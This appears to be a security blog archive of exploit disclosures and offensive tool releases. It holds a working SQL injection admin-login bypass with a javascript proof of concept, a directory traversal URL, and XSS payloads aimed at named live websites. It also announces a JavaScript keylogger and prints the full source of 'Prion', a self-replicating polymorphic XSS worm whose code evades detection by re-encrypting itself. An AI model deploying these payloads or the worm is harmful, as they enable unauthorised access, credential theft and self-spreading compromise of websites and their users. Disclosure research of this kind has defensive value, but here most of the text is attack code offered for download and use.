Tele Data Contact Management Server 0.9 SQL Injection

Tele Data Contact Management Server doesn't have much in the way of security. It's possible to log in with admin privileges by injecting SQL into the username field. As there are client side length constraints in place for the username field I packaged the exploit in some javascript for ease of use.

Exploit: or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--

PoC: javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();

OneHTTPD 0.6 Directory Traversal

It's possible to navigate the local file system of a server running OneHTTPD 0.6 by using a specially crafted url.

http://localhost/%C2../%C2../%C2../%C2../%C2../%C2../%C2../%C2../

Stumpleupon.com Reflected XSS

The code that displays spelling corrections does not encode user submitted data.

http://www.stumbleupon.com/search?q=teh<script>alert(0)</script>

Ning.com Persistent XSS

Less than and greater than characters submitted in the descriptions of albums, images and probably others are unencoded. Any tags submitted in such fields are subjected to whitelist validation, but this can be bypassed by prepending a less than character to the injected open and close tags.

Exploit: <<script>alert(0)//<</script>

PoC: http://coniferous.ning.com/photo/792231134-1

Javascript Keylogger 1.4 Released

A python HTTP server has been added to allow for greater cross-platform compatibility.

Download 1

Download 2

Prion 1.3 Released - Polymorphic XSS Worm

Because of Prion's large memory footprint it isn't suitable for use with every XSS vulnerability. For this reason I decided to create Prion Lite, a scaled down version of Prion small enough to be used with most XSS vulnerabilities, reflected or persistent. Of course this comes at a cost: unlike Prion, which carries its entire codebase with it, instances of the new Lite version must reference an off-site javascript file, another piece of evidence for anyone that might be looking for such things.

1.3 Changes
Cleaned up code
Prion lite added
Mickey mouse encryption algorithm updated (Prion lite only)
Reorder transformation added (Prion lite only)
Miscellaneous bug fixes

Download

Prion 1.2 Released - Polymorphic XSS Worm

Prion 1.2 is out, and it's quite an improvement over the last version. The updated encoding algorithm eliminated a lot of bloat, and the new code transformations make the decryptor of each worm instance unique.

1.2 Changes
Integer splitting transformation added
Variable rename transformation added
Added compressed version
Test UI updated

Download


/* Prion 1.2 by John Leitch - john.leitch5@gmail.com *//*worm start*/var startToken='/*worm start*/',endToken='/*worm '+'end*/';var generatedVars=new Array();function random(a,b){return Math.round((b-a)*Math.random()+a)}var varNameChars='_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';function genVarName(){var a;do{var b=random(3,14);a='';for(var i=0;i<b;i++){var r=random(0,varNameChars.length-1);a+=varNameChars[r]}}while(varUsed(a));return a}function varUsed(a){for(var i=0;i<generatedVars.length;i++){if(generatedVars[i]==a){return true}}return false}function transformInt(a,b){var c=['+','-','*','/'];var d='';for(var i=0;i<b;i++){var e=random(0,3);var f=d.match(/-?[\d\.]+/g);if(f!=null){for(var j=0;j<f.length;j++){if(f[j].indexOf('.')!=-1){f.splice(j,1);j--;continue}}if(f.length==0)break}if(d!=''){var g=f[random(0,f.length-1)];a=parseInt(g.match(/-?\d+/))}var h='';switch(e){case 0:var x=random(-1000,1000);var y=a-x;h='('+x+'+'+y+')';break;case 1:var y=random(0,1000);var x=a+y;h='('+x+'- '+y+')';break;case 2:var y=random(-1000,1000);var x=a/y;h='Math.round('+x+'*'+y+')';break;case 3:var y=random(-1000,1000);var x=a*y;h='('+x+'/'+y+')';break}if(d!=''){var k=new RegExp('([^\\d\\.]|^)'+a+'(([^\\d\\.])|$)');var l=d;d=d.replace(k,'$1'+h+'$2');try{var m=eval(d)}catch(err){alert('error evaling\r\n\r\n'+'old: '+l+'\r\n\r\n'+'new: '+d+'\r\n\r\n'+'regex: '+k+'\r\n\r\n'+'error: '+err)}}else{d=h}}return d}function encrypt(a){var b=[Math.floor(Math.random()*256),Math.floor(Math.random()*256)];var d=genVarName();var e=genVarName();var f=genVarName();var g=genVarName();var h=8;var j=transformInt(32,random(2,h));var k=transformInt(127,random(2,h));var l=transformInt(2,random(2,h));var m=startToken+'var k0='+b[0]+'\x3b'+'var k1='+b[1]+'\x3b'+'var '+d+'=\'';for(var i=0;i<a.length;i++){var c=(a.charCodeAt(i)^b[0]^b[1]).toString(16);m+=c.length==2?c:+'0'+c}m+='\'\x3bvar '+e+'=\'\'\x3b'+'for(var '+f+'=0;'+f+'<'+d+'.length;'+f+'+=2){'+'var '+g+'=parseInt('+d+'['+f+']+'+d+'['+f+'+1],16)^k0^k1\x3b'+'if('+g+'==10 || ('+g+'>='+j+' && '+g+'\x3c'+k+'))'+'{'+e+'+=String.fromCharCode('+g+')\x3b}'+''+'}'+'if('+e+'['+e+'.length-1]!=\'\x3b\'){'+e+'='+e+'.substring(0,('+e+'.length-'+l+'))\x3b'+'}'+'eval('+e+');'+endToken;return m}function findKey(a,b){var c=new RegExp('var\\sk'+b+'=(\\d+)');var d=c.exec(a);if(d==null){alert('key byte '+b+' not found');return null}return d[1]}function decrypt(a){var b=[findKey(a,0),findKey(a,1)];if(!b[0]||!b[1])return;var c=a.match(/var\s[\w_]+='([\d\w]+)'\x3b/);if(c==null){alert('packed code not found');return}var d='';var e=c[1].split(',');for(var i=0;i<c[1].length;i+=2){d+=String.fromCharCode(parseInt(c[1][i]+c[1][i+1],16)^b[1]^b[0])}return d}function findSelf(a){var x=a.indexOf(startToken)+startToken.length;var y=a.indexOf(endToken,x);var b=a.substring(x,y);b=b.replace(/\x26lt;/g,'\x3c');return b}var code=findSelf(document.body.innerHTML);if(code.indexOf('var k0=')==0){code=decrypt(code)}var encoded=encrypt(code);document.getElementById('xssWorm').innerHTML=encoded.replace(/\x3c/g,'\x26lt;');/*worm end*/